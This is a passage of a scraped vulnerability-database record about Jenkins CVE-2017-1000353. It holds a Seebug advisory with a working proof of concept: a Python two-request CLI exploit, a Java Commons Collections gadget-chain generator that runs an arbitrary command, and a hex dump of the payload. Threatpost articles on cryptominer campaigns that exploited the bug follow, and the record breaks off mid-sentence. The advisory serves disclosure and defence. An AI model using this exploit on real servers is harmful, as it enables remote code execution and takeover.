For more details: [https://jenkins.io/security/advisory/2017-04-26](https://jenkins.io/security/advisory/2017-04-26)/\r\n\r\n\r\n#### **Vulnerability Details**\r\n\r\nJenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.\r\n\r\nThe vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.\r\n\r\nThe first request starts a session for the bi-directional channel and is used for \u201c_downloading_\u201d data from the server. The HTTP header \u201c_Session_\u201d is the identifier for the channel. The HTTP header \u201c_Side_\u201d specifies the \u201c_downloading/uploading_\u201d direction.\r\n\r\n\r\n\r\nThe second request is the sending component\u00a0of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the \u201c_Session_\u201d HTTP header which is just a UUID.\r\n\r\n\r\n\r\nAll commands sent to the CLI start with a preamble which is often:\r\n\r\n```\r\n<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\r\n```\r\n\r\nThe preamble contains a base64 encoded serialized object. The serialized object of type \u201cCapability\u201d just tells the server which capabilities (e.g. HTTP\r\nchunked encoding) the client has.\r\n\r\nAfter the preamble and some additional bytes a serialized object of type Command is expected by the Jenkins server. 
Since Jenkins does not validate the serialized object, any serialize object can be sent.\r\n\r\nThe deserialization is code is in the method \u201creadFrom\u201d of class \u201cCommand\u201d:\r\n\r\n\r\nThe command is\u00a0called by the\u00a0\u201c_read()_\u201d of class \u201c_ClassicCommandTransport_\u201d.\r\n\r\n\r\n\r\nThe data coming \u201c_from_\u201d the \u201c_upload_\u201d-side of the channel is read in a thread of type ReaderThread.\r\n\r\n\r\n\r\nThe thread is triggered by the \u201c_upload_\u201d-method which is called in class \u201c_CliEndpointResponse_\u201d.\r\n\r\n\r\n\r\nIn that method the HTTP body data is read and the \u201cnotify\u201d method is called to notify the thread.\r\n\r\n\r\n\r\n**Proof of Concept**\r\n\r\nIn order to exploit the vulnerability, an attacker needs to create a serialized payload with\u00a0the command to execute by running the payload.jar script.\r\n\r\nThe second step is to change python script jenkins_poc1.py:\r\n\r\n* Adjust target url in URL variable\r\n* Change file to open in line \u201cFILE_SER = open(\u201cjenkins_poc1.ser\u201d, \u201crb\u201d).read()\u201d to your payload file.\r\n\r\nBy doing the previous steps, you should see the following massage in the log/stdout of jenkins:\r\n\r\n```\r\nJan 26, 2017 2:22:41 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run\r\nSEVERE: I/O error in channel HTTP full-duplex channel a403c455-3b83-4890-b304-ec799bffe582\r\nhudson.remoting.DiagnosedStreamCorruptionException\r\nRead back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 
0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a\r\n'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*< ' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '~' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 0x01 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x06 'randomsr' 0x00 '*org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '-[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '-[Lorg.apache.commons.collections.Transformer;' 0xbd 'V*' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '~' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 
0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a\r\n'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x1b 'sq' 0x00 '~' 0x00 0x13 'uq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x18 'sq' 0x00 '~' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 0x05 'xtermt' 0x00 0x04 'execuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a\r\n'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '~' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'I:aj' 0x01 0xfe 0xe7 'Kh' 0x98 '-' 0x9c 'o!' 
0x05 'H' 0x84 0xfa 0xb1 0x82 0x02 0x15 0x00 0x90 0x0a\r\n0x92 0x0d 'x' 0xa2 '~~' 0xdd 0xba 0xa3 0xe8 0xf6 'x\\3' 0xcd 0x98 0x06 '*t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To\\(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '~' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x06 'randomxxsq' 0x00 '~' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x02 'sq' 0x00 '~' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '~' 0x00 0x1a 'q' 0x00 '~' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px'\r\nRead ahead: \r\n\tat hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:80)\r\n\tat hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93)\r\n\tat hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75)\r\n\tat hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:59)\r\nCaused by: java.lang.ClassCastException: org.apache.commons.collections.map.ReferenceMap cannot be cast to hudson.remoting.Command\r\n\tat hudson.remoting.Command.readFrom(Command.java:96)\r\n\tat hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70)\r\n```\r\n\r\n**jenkins_poc1.py**\r\n\r\n```\r\nimport 
urllib\r\n\r\nimport requests\r\nimport uuid\r\nimport threading\r\nimport time\r\nimport gzip\r\nimport urllib3\r\nimport zlib\r\n\r\nproxies = {\r\n# 'http': 'http://127.0.0.1:8090',\r\n# 'https': 'http://127.0.0.1:8090',\r\n}\r\n\r\nURL='http://192.168.18.161:8080/cli'\r\n\r\nPREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\r\nPROTO = '\\x00\\x00\\x00\\x00'\r\n\r\n\r\nFILE_SER = open(\"jenkins_poc1.ser\", \"rb\").read()\r\n\r\ndef download(url, session):\r\n\r\n headers = {'Side' : 'download'}\r\n headers['Content-type'] = 'application/x-www-form-urlencoded'\r\n headers['Session'] = session\r\n headers['Transfer-Encoding'] = 'chunked'\r\n r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)\r\n print r.text\r\n\r\n\r\ndef upload(url, session, data):\r\n\r\n headers = {'Side' : 'upload'}\r\n headers['Session'] = session\r\n headers['Content-type'] = 'application/octet-stream'\r\n headers['Accept-Encoding'] = None\r\n r = requests.post(url,data=data,headers=headers,proxies=proxies)\r\n\r\n\r\ndef upload_chunked(url,session, data):\r\n\r\n headers = {'Side' : 'upload'}\r\n headers['Session'] = session\r\n headers['Content-type'] = 'application/octet-stream'\r\n headers['Accept-Encoding']= None\r\n headers['Transfer-Encoding'] = 'chunked'\r\n headers['Cache-Control'] = 'no-cache'\r\n\r\n r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)\r\n\r\n\r\ndef null_payload():\r\n yield \" \"\r\n\r\ndef create_payload():\r\n payload = PREAMLE + PROTO + FILE_SER\r\n\r\n return payload\r\n\r\ndef create_payload_chunked():\r\n yield PREAMLE\r\n yield PROTO\r\n yield FILE_SER\r\n\r\ndef main():\r\n print \"start\"\r\n\r\n session = str(uuid.uuid4())\r\n\r\n t = threading.Thread(target=download, args=(URL, session))\r\n t.start()\r\n\r\n time.sleep(1)\r\n print \"pwn\"\r\n #upload(URL, session, create_payload())\r\n\r\n 
upload_chunked(URL, session, \"asdf\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\r\n**payload.jar**\r\n\r\n```\r\nimport java.io.FileOutputStream;\r\nimport java.io.ObjectOutputStream;\r\nimport java.io.ObjectStreamException;\r\nimport java.io.Serializable;\r\nimport java.lang.reflect.Field;\r\nimport java.security.KeyPair;\r\nimport java.security.KeyPairGenerator;\r\nimport java.security.PrivateKey;\r\nimport java.security.PublicKey;\r\nimport java.security.Signature;\r\nimport java.security.SignedObject;\r\nimport java.util.Comparator;\r\nimport java.util.HashMap;\r\nimport java.util.HashSet;\r\nimport java.util.Map;\r\nimport java.util.concurrent.ConcurrentSkipListSet;\r\nimport java.util.concurrent.CopyOnWriteArraySet;\r\n\r\nimport net.sf.json.JSONArray;\r\n\r\nimport org.apache.commons.collections.Transformer;\r\nimport org.apache.commons.collections.collection.AbstractCollectionDecorator;\r\nimport org.apache.commons.collections.functors.ChainedTransformer;\r\nimport org.apache.commons.collections.functors.ConstantTransformer;\r\nimport org.apache.commons.collections.functors.InvokerTransformer;\r\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\r\nimport org.apache.commons.collections.map.LazyMap;\r\nimport org.apache.commons.collections.map.ReferenceMap;\r\nimport org.apache.commons.collections.set.ListOrderedSet;\r\n\r\npublic class Payload implements Serializable {\r\n\r\n private Serializable payload;\r\n\r\n public Payload(String cmd) throws Exception {\r\n\r\n this.payload = this.setup(cmd);\r\n\r\n }\r\n\r\n public Serializable setup(String cmd) throws Exception {\r\n final String[] execArgs = new String[] { cmd };\r\n\r\n final Transformer[] transformers = new Transformer[] {\r\n new ConstantTransformer(Runtime.class),\r\n new InvokerTransformer(\"getMethod\", new Class[] { String.class,\r\n Class[].class }, new Object[] { \"getRuntime\",\r\n new Class[0] }),\r\n new InvokerTransformer(\"invoke\", new Class[] { 
Object.class,\r\n Object[].class }, new Object[] { null, new Object[0] }),\r\n new InvokerTransformer(\"exec\", new Class[] { String.class },\r\n execArgs), new ConstantTransformer(1) };\r\n\r\n Transformer transformerChain = new ChainedTransformer(transformers);\r\n\r\n final Map innerMap = new HashMap();\r\n\r\n final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);\r\n\r\n TiedMapEntry entry = new TiedMapEntry(lazyMap, \"foo\");\r\n\r\n HashSet map = new HashSet(1);\r\n map.add(\"foo\");\r\n Field f = null;\r\n try {\r\n f = HashSet.class.getDeclaredField(\"map\");\r\n } catch (NoSuchFieldException e) {\r\n f = HashSet.class.getDeclaredField(\"backingMap\");\r\n }\r\n\r\n f.setAccessible(true);\r\n HashMap innimpl = (HashMap) f.get(map);\r\n\r\n Field f2 = null;\r\n try {\r\n f2 = HashMap.class.getDeclaredField(\"table\");\r\n } catch (NoSuchFieldException e) {\r\n f2 = HashMap.class.getDeclaredField(\"elementData\");\r\n }\r\n\r\n f2.setAccessible(true);\r\n Object[] array2 = (Object[]) f2.get(innimpl);\r\n\r\n Object node = array2[0];\r\n if (node == null) {\r\n node = array2[1];\r\n }\r\n\r\n Field keyField = null;\r\n try {\r\n keyField = node.getClass().getDeclaredField(\"key\");\r\n } catch (Exception e) {\r\n keyField = Class.forName(\"java.util.MapEntry\").getDeclaredField(\r\n \"key\");\r\n }\r\n\r\n keyField.setAccessible(true);\r\n keyField.set(node, entry);\r\n\r\n KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"DSA\");\r\n keyPairGenerator.initialize(1024);\r\n KeyPair keyPair = keyPairGenerator.genKeyPair();\r\n PrivateKey privateKey = keyPair.getPrivate();\r\n PublicKey publicKey = keyPair.getPublic();\r\n\r\n Signature signature = Signature.getInstance(privateKey.getAlgorithm());\r\n SignedObject payload = new SignedObject(map, privateKey, signature);\r\n JSONArray array = new JSONArray();\r\n\r\n array.add(\"asdf\");\r\n\r\n ListOrderedSet set = new ListOrderedSet();\r\n Field f1 = 
AbstractCollectionDecorator.class\r\n .getDeclaredField(\"collection\");\r\n f1.setAccessible(true);\r\n f1.set(set, array);\r\n\r\n DummyComperator comp = new DummyComperator();\r\n ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);\r\n csls.add(payload);\r\n\r\n CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();\r\n CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();\r\n\r\n a1.add(set);\r\n Container c = new Container(csls);\r\n a1.add(c);\r\n\r\n a2.add(csls);\r\n a2.add(set);\r\n\r\n ReferenceMap flat3map = new ReferenceMap();\r\n flat3map.put(new Container(a1), \"asdf\");\r\n flat3map.put(new Container(a2), \"asdf\");\r\n\r\n return flat3map;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return this.payload;\r\n }\r\n\r\n static class Container implements Serializable {\r\n\r\n private Object o;\r\n\r\n public Container(Object o) {\r\n this.o = o;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return o;\r\n }\r\n\r\n }\r\n\r\n static class DummyComperator implements Comparator, Serializable {\r\n\r\n public int compare(Object arg0, Object arg1) {\r\n // TODO Auto-generated method stub\r\n return 0;\r\n }\r\n\r\n private Object writeReplace() throws ObjectStreamException {\r\n return null;\r\n }\r\n\r\n }\r\n\r\n public static void main(String args[]) throws Exception{\r\n\r\n if(args.length != 2){\r\n System.out.println(\"java -jar payload.jar outfile cmd\");\r\n System.exit(0);\r\n }\r\n\r\n String cmd = args[1];\r\n FileOutputStream out = new FileOutputStream(args[0]);\r\n\r\n Payload pwn = new Payload(cmd);\r\n ObjectOutputStream oos = new ObjectOutputStream(out);\r\n oos.writeObject(pwn);\r\n oos.flush();\r\n out.flush();\r\n\r\n\r\n }\r\n\r\n}\r\n```\r\n\r\n\r\n#### **Editor's note**\r\nThe Chinese security community has already published a detection plugin for this vulnerability (Xunfeng, https://github.com/ysrc/xunfeng/ ) 
, and `Docker`-based vulnerability test environments:\r\n* https://github.com/Medicean/VulApps\r\n* https://github.com/phith0n/vulhub", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins Java Deserialization Remote Code Execution Vulnerability (CVE-2017-1000353)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93062", "id": "SSV:93062", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:57:52", "description": "Jenkins uses the XStream library to serialize and deserialize XML. Its maintainer [recently published a security vulnerability](http://www.openwall.com/lists/oss-security/2017/04/03/4) that allows anyone able to provide XML to Jenkins for processing using XStream to crash the Java process. In Jenkins this typically applies to users with permission to create or configure items (jobs), views, or agents.\r\n\r\nJenkins now prohibits the attempted deserialization of void / Void that results in a crash.", "published": "2017-04-28T00:00:00", "type": "seebug", "title": "Jenkins XStream: Java crash when trying to instantiate void/Void (CVE-2017-1000355)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000355"], "modified": "2017-04-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93065", "id": "SSV:93065", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2017-05-05T18:47:52", "description": "CloudBees Jenkins 2.32.1 - Java Deserialization. CVE-2017-1000353. Dos exploit for Java platform. 
Tags: Denial of Service (DoS)", "published": "2017-05-05T00:00:00", "type": "exploitdb", "title": "CloudBees Jenkins 2.32.1 - Java Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000353"], "modified": "2017-05-05T00:00:00", "id": "EDB-ID:41965", "href": "https://www.exploit-db.com/exploits/41965/", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3171\r\n\r\nVulnerability Details\r\n\r\nJenkins is affected by a Java deserialization vulnerability. In order to trigger the vulnerability, two requests need to be sent.\r\n\r\nThe vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.\r\n\r\nThe first request starts a session for the bidirectional channel and is used for \u201cdownloading\u201d data from the server. The HTTP header \u201cSession\u201d is the identifier for the channel. The HTTP header \u201cSide\u201d specifies the \u201cdownloading/uploading\u201d direction.\r\n\r\nThe second request is the sending component of the bidirectional channel. The first request is blocked until the second request is sent. 
The request for a bidirectional channel is matched by the \u201cSession\u201d HTTP header, which is just a UUID.\r\n\r\n\r\nProof of Concept\r\n\r\nIn order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.\r\n\r\nThe second step is to change the Python script jenkins_poc1.py:\r\n- Adjust the target URL in the URL variable\r\n- Change the file opened in the line \u201cFILE_SER = open(\u201cjenkins_poc1.ser\u201d, \u201crb\u201d).read()\u201d to your payload file.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41965.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41965/"}], "threatpost": [{"lastseen": "2019-04-25T05:49:50", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353"], "description": "Hackers behind cryptominer attacks are growing more aggressive and ruthless. Case in point, a cryptominer malware sample dubbed WinstarNssmMiner has been tracked in 500,000 attacks in the past three days, earning the crooks $28,000, according to researchers.\n\nWhat makes the cryptominer so vicious is the fact that, post infection, if a victim\u2019s AV software identifies WinstarNssmMiner and tries to remove it (or a user tries to disable it) the malware crashes the host system. WinstarNssmMiner targets Windows systems and leeches onto a system\u2019s processor power with a trojanized version of the XMRig mining program.\n\n\u201cThis malware is very hard to remove since victims\u2019 computers crash as soon as [it\u2019s] found,\u201d according to 360 Security researchers who published a [report on the malware Wednesday](<https://blog.360totalsecurity.com/en/cryptominer-winstarnssmminer-made-fortune-brutally-hijacking-computer/>). 
\u201cWe\u2019re quite surprised to see a cryptominer being so brutal to hijack victims\u2019 computers by adopting techniques of stubborn malware,\u201d researchers wrote.\n\nAn analysis of the cryptominer campaign reveals WinstarNssmMiner has already earned cybercriminals 133 Monero, or $28,000 based on current rates. Researchers did not specify how long it took criminals to earn that money.\n\nThose totals are a drop in the bucket for crypto-jacking campaigns. Malicious cryptomining that targets computers, servers or cloud-based systems has seen enormous growth over the last six months, earning crooks millions in cryptocurrency. In February, hackers are estimated to have earned $3 million by exploiting a vulnerability ([CVE-2017-1000353](<https://jenkins.io/security/advisory/2017-04-26/>)) on servers running Jenkins software and installing Monero miners, researchers at [Check Point reported](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>).\n\nIt\u2019s unclear what the WinstarNssmMiner infection path is, but once the malware executes on a targeted system it launches a system process called svchost.exe, a process that manages system services. Next, it injects malicious code into svchost.exe.\n\n\u201cThere are actually two svchost.exe processes created. One performs the mining tasks. The other runs in the background for sensing the antivirus protection and avoiding detection,\u201d researchers said.\n\nThe svchost.exe process created for cryptomining has a process attribute of CriticalProcess, which means terminating the process crashes the system. A second svchost.exe process runs in the background and attempts to detect \u201cdecent\u201d antivirus software that developers know can identify the malware. \u201c[The] malware will quit automatically to avoid direct confrontation,\u201d researchers said.\n\nThe miner itself is based on the open source project, XMRig. 
XMRig is a legitimate cryptocurrency mining program known as a high performance Monero CPU miner. The miner is better known for its trojanized versions that have been adopted for criminal use. It has been used [in several recent malicious cryptocurrency campaigns](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) and one in January where it was installed via malware on [15 to 30 million endpoints](<https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/>), according to a report by Palo Alto Networks.\n\nXMRig code was also used in recent attacks, such as the Jenkins miner, and also with malicious campaigns dubbed RubyMiner and WaterMiner, according to [an IBM X-Force Research report](<https://securityintelligence.com/xmrig-father-zeus-of-cryptocurrency-mining-malware/>).\n", "modified": "2018-05-16T19:56:09", "published": "2018-05-16T19:56:09", "id": "THREATPOST:BE009076F7BB03DF3F38AEAC53E3DE88", "href": "https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/", "type": "threatpost", "title": "New Cryptominer Distributes XMRig in Aggressive Attacks", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-03T05:58:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. 
It uses new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on GitHub and Twitter just days after the latest flaw was publicized. 
Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. 
In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted from the system.\n\nCroniX is also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe 